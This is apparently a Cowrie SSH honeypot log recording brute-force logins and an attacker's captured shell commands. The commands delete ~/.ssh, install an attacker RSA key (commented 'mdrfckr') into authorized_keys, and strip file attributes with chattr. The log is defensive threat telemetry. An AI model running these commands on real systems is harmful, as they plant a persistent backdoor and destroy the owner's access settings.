{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:29:22.402767Z","src_ip":"212.227.235.229","session":"5bcf2d4c2660"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:29:22.403452Z","src_ip":"212.227.235.229","session":"5bcf2d4c2660"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:29:22.550154Z","src_ip":"212.227.235.229","session":"5bcf2d4c2660"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:22.551153Z","src_ip":"212.227.235.229","session":"5bcf2d4c2660"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50032,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7de1d4d07ae","protocol":"ssh","message":"New connection: 212.227.235.229:50032 (1.2.3.4:22) [session: b7de1d4d07ae]","sensor":"my-vps","timestamp":"2025-08-26T05:29:22.701484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:29:22.703514Z","src_ip":"212.227.235.229","session":"b7de1d4d07ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:29:22.854707Z","src_ip":"212.227.235.229","session":"b7de1d4d07ae"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:29:23.463315Z","src_ip":"212.227.235.229","session":"b7de1d4d07ae"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:24.618465Z","src_ip":"212.227.235.229","session":"b7de1d4d07ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50044,"dst_ip":"1.2.3.4","dst_port":22,"session":"acdb089e048d","protocol":"ssh","message":"New connection: 212.227.235.229:50044 (1.2.3.4:22) [session: acdb089e048d]","sensor":"my-vps","timestamp":"2025-08-26T05:29:24.770633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:29:24.771585Z","src_ip":"212.227.235.229","session":"acdb089e048d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:29:24.923488Z","src_ip":"212.227.235.229","session":"acdb089e048d"}
{"eventid":"cowrie.login.failed","username":"noc","password":"admin","message":"login attempt [noc/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T05:29:25.452148Z","src_ip":"212.227.235.229","session":"c178bfb1ff3a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:29:25.575511Z","src_ip":"212.227.235.229","session":"acdb089e048d"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:25.729548Z","src_ip":"212.227.235.229","session":"5bcf2d4c2660"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:25.730384Z","src_ip":"212.227.235.229","session":"acdb089e048d"}
{"eventid":"cowrie.session.closed","duration":"48.3","message":"Connection lost after 48.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:28.301444Z","src_ip":"212.227.235.229","session":"c178bfb1ff3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60442,"dst_ip":"1.2.3.4","dst_port":22,"session":"c23fda0a319b","protocol":"ssh","message":"New connection: 212.227.235.229:60442 (1.2.3.4:22) [session: c23fda0a319b]","sensor":"my-vps","timestamp":"2025-08-26T05:29:28.409988Z"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:31.327925Z","src_ip":"212.227.235.229","session":"c23fda0a319b"}
{"eventid":"cowrie.session.closed","duration":"72.4","message":"Connection lost after 72.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:52.401870Z","src_ip":"212.227.235.229","session":"c8d44ad071c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36780,"dst_ip":"1.2.3.4","dst_port":22,"session":"4927b64734d8","protocol":"ssh","message":"New connection: 212.227.235.229:36780 (1.2.3.4:22) [session: 4927b64734d8]","sensor":"my-vps","timestamp":"2025-08-26T05:29:54.228936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:29:54.749171Z","src_ip":"212.227.235.229","session":"4927b64734d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T05:29:54.749841Z","src_ip":"212.227.235.229","session":"4927b64734d8"}
{"eventid":"cowrie.login.success","username":"root","password":"Kundan@123","message":"login attempt [root/Kundan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:29:57.903580Z","src_ip":"212.227.235.229","session":"4927b64734d8"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:58.526697Z","src_ip":"212.227.235.229","session":"4927b64734d8"}
{"eventid":"cowrie.session.connect","src_ip":"2.69.247.26","src_port":42181,"dst_ip":"1.2.3.4","dst_port":23,"session":"a43c80ed64e5","protocol":"telnet","message":"New connection: 2.69.247.26:42181 (1.2.3.4:23) [session: a43c80ed64e5]","sensor":"my-vps","timestamp":"2025-08-26T05:30:01.703283Z"}
{"eventid":"cowrie.session.closed","duration":14.262826204299927,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:30:15.965989Z","src_ip":"2.69.247.26","session":"a43c80ed64e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46184,"dst_ip":"1.2.3.4","dst_port":22,"session":"c24cbae92e38","protocol":"ssh","message":"New connection: 212.227.235.229:46184 (1.2.3.4:22) [session: c24cbae92e38]","sensor":"my-vps","timestamp":"2025-08-26T05:30:37.401919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:30:37.402798Z","src_ip":"212.227.235.229","session":"c24cbae92e38"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:30:37.582521Z","src_ip":"212.227.235.229","session":"c24cbae92e38"}
{"eventid":"cowrie.login.success","username":"root","password":"qw@123456","message":"login attempt [root/qw@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:30:38.340741Z","src_ip":"212.227.235.229","session":"c24cbae92e38"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:30:38.747511Z","src_ip":"212.227.235.229","session":"c24cbae92e38"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:30:38.748203Z","src_ip":"212.227.235.229","session":"c24cbae92e38"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:30:38.749319Z","src_ip":"212.227.235.229","session":"c24cbae92e38"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:30:38.930790Z","src_ip":"212.227.235.229","session":"c24cbae92e38"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:30:39.344143Z","src_ip":"212.227.235.229","session":"c24cbae92e38"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:30:39.344811Z","src_ip":"212.227.235.229","session":"c24cbae92e38"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:30:39.526744Z","src_ip":"212.227.235.229","session":"c24cbae92e38"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:30:39.527450Z","src_ip":"212.227.235.229","session":"c24cbae92e38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46196,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd2d5b72470b","protocol":"ssh","message":"New connection: 212.227.235.229:46196 (1.2.3.4:22) [session: fd2d5b72470b]","sensor":"my-vps","timestamp":"2025-08-26T05:30:39.707294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:30:39.708247Z","src_ip":"212.227.235.229","session":"fd2d5b72470b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:30:39.888653Z","src_ip":"212.227.235.229","session":"fd2d5b72470b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:30:40.652542Z","src_ip":"212.227.235.229","session":"fd2d5b72470b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:30:41.835776Z","src_ip":"212.227.235.229","session":"fd2d5b72470b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46204,"dst_ip":"1.2.3.4","dst_port":22,"session":"11edf34db8a9","protocol":"ssh","message":"New connection: 212.227.235.229:46204 (1.2.3.4:22) [session: 11edf34db8a9]","sensor":"my-vps","timestamp":"2025-08-26T05:30:42.008466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:30:42.009346Z","src_ip":"212.227.235.229","session":"11edf34db8a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:30:42.186799Z","src_ip":"212.227.235.229","session":"11edf34db8a9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:30:42.937141Z","src_ip":"212.227.235.229","session":"11edf34db8a9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:30:43.117349Z","src_ip":"212.227.235.229","session":"11edf34db8a9"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:30:43.120635Z","src_ip":"212.227.235.229","session":"c24cbae92e38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42432,"dst_ip":"1.2.3.4","dst_port":22,"session":"a04c894a972c","protocol":"ssh","message":"New connection: 212.227.235.229:42432 (1.2.3.4:22) [session: a04c894a972c]","sensor":"my-vps","timestamp":"2025-08-26T05:31:01.993838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:31:01.995245Z","src_ip":"212.227.235.229","session":"a04c894a972c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:31:02.210109Z","src_ip":"212.227.235.229","session":"a04c894a972c"}
{"eventid":"cowrie.login.success","username":"root","password":"asdfg1234567","message":"login attempt [root/asdfg1234567] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:31:03.110206Z","src_ip":"212.227.235.229","session":"a04c894a972c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:31:03.561510Z","src_ip":"212.227.235.229","session":"a04c894a972c"}
